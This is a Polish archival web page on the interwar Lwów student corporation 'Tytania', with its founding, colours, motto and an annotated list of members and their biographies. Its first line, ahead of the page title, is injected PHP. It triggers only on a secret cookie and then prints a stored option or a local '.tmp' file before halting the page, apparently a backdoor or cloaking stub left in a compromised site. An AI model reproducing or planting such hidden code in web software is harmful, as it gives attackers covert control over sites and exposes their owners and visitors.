if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Tytania

Dekiel Tytanii - vide Poszukiwania. Nazwa:
Polska Korporacja Studentów Politechniki Lwowskiej Wydziału Chemicznego “Tytania”
Siedziba:
Lwów
Data powstania:
luty 1929 r.
Barwy:
seledynowa – złota – bordowa
Dewiza:
„Si vis pacem, para bellum” („Jeśli chcesz pokoju, szykuj się do wojny”)

Rys historyczny

Tytania, lata 30-te.

Tytania powstała w lutym 1929 r. Była korporacją wydziałową i skupiała studentów Wydziału Chemicznego Politechniki Lwowskiej. Od marca 1929 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: marzec 1929 r.). Kandydowała pod opieką K! Scythia. Prawa członka rzeczywistego Związku uzyskała w kwietniu 1930 r.

Tytania, październik 1934 r.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 42 nazwiska, w tym trzech członków honorowych.

Po wojnie odbywały się sporadycznie spotkania grupy członków korporacji.

Tytania (?), Lwów lata 30-te.

Lista członków

Poniższa, niekompletna lista członków Tytanii obejmuje ponad 40 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Zygmunt Przyrembel, (1874 w Warszawie - 1943 w Warszawie) dr inż. chemik, wykładowca technologii przemysłu cukrowego Wydziału Chemicznego PL 1930-39, historyk cukrownictwa, Filister honorowy Tytatnii
 2. Stanisław Rybicki, (1856 w Rzeszowie - 1940) absolwent Politechniki w Karlsruhe 1880, prezes lwowskiej DOKP, Filister honorowy Tytatnii, zmarł w sowieckim więzieniu
 3. Adam Tiger, ( - 1939) absolwent mechaniki PL, w 1918 obrońca Lwowa jako oficer-obserwator eskadry, mjr WP, dyrektor Wojskowego Biura Ligii Obrony Powietrznej i Przeciwgazowej, Filister honorowy Tytanii, zamordowany przez NKWD

Członkowie rzeczywiści

 1. Adam Babiński, (1913 - ) c. 1933, prezes, sekretarz Bratniej Pomocy Studentów PL 1933, po wojnie na emigracji w Wielkiej Brytanii, działacz Stronnictwa Narodowego na emigracji
 2. Bohdan Brodowski, (26 stycznia 1911 w Pohrebyszczu - ) c. 1930, olderman 1934, absolwent PL 1935, ppor., internowany w Szwajcarii 1940, nauczyciel w polskim gimnazjum i liceum, po wojnie dyrektor techniczny zakładów chemicznych w Jeleniej Górze i Gorzowie
 3. Benno Buzek, student i absolwent PL 1937, po wojnie w Niemczech
 4. Bolesław Feliks Chudzio Chudzio, (ur. w Stanisławowie - ) student i absolwent PL 1936, akt. 1929-36,
 5. Jan Cirin, (1905-1993) student i absolwent PL, założyciel i pierwszy prezes Tytanii
 6. Jerzy Copik, (ur. w Bielaszowicach - ) student i absolwent PL 1936
 7. Jan Dobrowolski, (1919-1997) student PL, c. 1937, po wojnie absolwent PG, prof. zw. PG
 8. Jerzy Gambietz, student i absolwent 1936, akt. 1930-36
 9. Bronisław Gawron, dpl. 1934
 10. Jan Górniak, (1908 we Lwowie - ) dpl. 1934
 11. Jan Józef Hosowicz, (27 stycznia 1908 w Stanisł-Kniahininie - 7 kwietnia 1983 w Kraków) student i absolwent PL 1937, prezes r.a. 1930/31, olderman 1932, sekretarz 1931 i wiceprezes 1933 Bratniej Pomocy Studentów PL, po wojnie w biurach projektowych przemysłu chemicznego, działacz Polskiego Związku Katolicko-Społecznego w Krakowie 1980-83
 12. Stefan Kotowicz, (1908 - maj 2005) student i absolwent chemii PL, c. 1930, olderman 1932, po wojnie prof. PŚ
 13. Stanisław Kazimierz Kuliński, (ur. w Krakowie - ) student i absolwent PL 1935
 14. Jan Kwapiński, student i absolwent PL 1937, sekretarz, wiceprezes, sekretarz, olderman
 15. Zbigniew Jan Leon Lang, (ur. w Ustrzykach Dolnych - zm. w Wielkiej Brytanii) student i absolwent PL 1934, założyciel Tytanii, drugi prezes 1930, olderman 1933, po wojnie na emigracji w Wielkiej Brytanii
 16. Stanisław Lasecki, sekretarz r.a. 1930/31
 17. Mieczysław Lubiński, akt. 1935-39, ppor. rez. artylerii
 18. Witold (?) Łukasiewicz,
 19. Adam Mazurkiewicz, (1908 - ) wiceprezes 1928, dpl. 1934

  Bogusław Musiałowicz, 1937 r.

 20. Bogusław Musiałowicz, (11 kwietnia 1910 w Ostrowcu Świętokrzyskim - 10 marca 1988) s. Józefa i Heleny z Sempolińskich, absolwent PL 1938, żołnierz wojny obronny obronnej 1939, por. art. II Korpusu PSZ na Zachodzie 1940-46, po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, pochowany na Cmentarzu Maryhill w Niles, odznaczony Krzyżem Walecznych, Krzyżem Monte Cassino, brytyjskimi 1939-45 Star, Africa Star, Italy Star, Defence Medal

 21. Marian Myronowicz (Mironowicz), (1908 w Nowym Sączu - ) olderman r.a. 1930/31, dpl. 1934
 22. Władysław (?) Nowak,
 23. Roman Oswald, (ur. we Lwowie - ) student i absolwent PL 1936, prezes, olderman, po wojnie na emigracji w Hiszpanii
 24. Fryderyk Edmund Penno, (1908 w Ziemięcinie - 1996) student i absolwent PL 1938, prezes 1932, asystent PL 1936-38, adiunkt PL 1938/39
 25. Bolesław Petecki, ( - zm. Londyn) wiceprezes 1934, po wojnie na emigracji w Wielkiej Brytanii
 26. Zenon Piasek, prof., członek PAN
 27. Stanisław Schroter, (8 maja 1917 w Katowicach - ) pochodzi z Sosnowca, uczestnik wojny obronnej 1939, internowany na Węgrzech, później we Francji oraz Anglii, żołnierz II Korpusu PSZ na Zachodzie, absolwent polskiego uniwersytetu w Londynie, inż. chemik, po wojnie na emigracji w Stanach Zjednoczonych, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago
 28. Antoni Sentek, (13 czerwca 1910 w Kołomyi - 25 maja 1988) student i absolwent PL 1937
 29. Stanisław Sędzik, wiceprezes 1934 i prezes 1935 Bratniej Pomocy Studentów PL, w czasie wojny lotnik RAF, po wojnie na emigracji w Wielkiej Brytanii
 30. Jan Smołucha, (1905-1995)
 31. Juliusz Solarski, (1920 - 8 kwietnia 1997 w Warszawie) c. 1938, absolwent chemii Politechniki Gliwickiej, członek Komisji Rewizyjnej Stowarzyszenia Filistrów Polskich Korporacji Akademickich 1993-95 i 1995-97
 32. Stefan Struk, akt. 1937-39
 33. Stanisław Szustkiewicz-Rola, (ok. 1915 w Mszczonowie - 1992) student i absolwent PL 1938, po wojnie na emigracji w Stanach Zjednoczonych, prof.
 34. Roman Tworos, (1908-1990) wiceprezes r.a. 1930/31
 35. Władysław Werbachowski, (1909 - ) c. 1929, mgr inż. chemik PW
 36. Antoni (?) Westfalowicz,
 37. Kazimierz Wiszniowski, (ur. w Stanisławowie - ) student i absolwent PL 1936, prezes 1934
 38. Bogdan Worsztynowicz, akt. 1935
  Władysław Wójcik, lata 30-te.

 39. Władysław Wójcik, (21 stycznia 1908 w Krakowie - 25 grudnia 1983 w Rzeszowie) s. Józefa i Marii, absolwent gimanzjum w Krakowie, student i absolwent chemii PL, asystent PL 1931-33, a następnie do 1939 asystent dyrektora w wojskowych zakładach zbrojeniowych w Skarżysku Kamiennej, po wojnie od 1949 pracownik Przemysłu Terenowego w Rzeszowie, wieloletni zastępca dyrektora i dyrektor, radny Miejskiej Rady Narodowej w Rzeszowie, przewodniczący wojewódzkiej rady NOT w Rzeszowie i członek władz centralnych NOT, bezpartyjny, odznaczony Krzyżem Kawalerskim OOP i Złotą Odznaką NOT, pochowany na cmentarzu Wilkowyja w Rzeszowie

Listę członków opracowano na podstawie:

1) Zbysław Popławski, Lista członków Polskiej Korporacji Akademickiej Tytania (Lwów), (w:) Polskie Korporacje Akademickie 1996, nr 11, s. 92 i n.
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Tytania.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 13 IX 2010 r.
Ostatnia zmiana 27 II 2012 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Studentów Politechniki Lwowskiej Wydziału Chemicznego “Tytania”, (na:) www.archiwumkorporacyjne.pl, stan 27 II 2012 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }